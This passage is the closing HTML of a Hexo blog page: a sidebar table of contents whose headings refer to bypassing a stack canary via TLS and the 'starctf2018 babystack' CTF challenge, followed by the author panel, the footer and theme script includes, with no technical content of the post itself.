class="nav-link" href="#%E4%B8%80%E9%81%93%E4%BE%8B%E9%A2%98-1"><span class="nav-number">3.0.1.</span> <span class="nav-text">一道例题</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E2%91%A3%E4%BF%AE%E6%94%B9TSL%E4%B8%AD%E7%9A%84Canary%E5%80%BC%E5%AE%9E%E7%8E%B0%E7%BB%95%E8%BF%87Canary"><span class="nav-number">4.</span> <span class="nav-text">④修改TSL中的Canary值实现绕过Canary</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9-1"><span class="nav-number">4.0.1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#starctf2018-babystack"><span class="nav-number">4.0.2.</span> <span class="nav-text">starctf2018 babystack</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">58</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">38</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
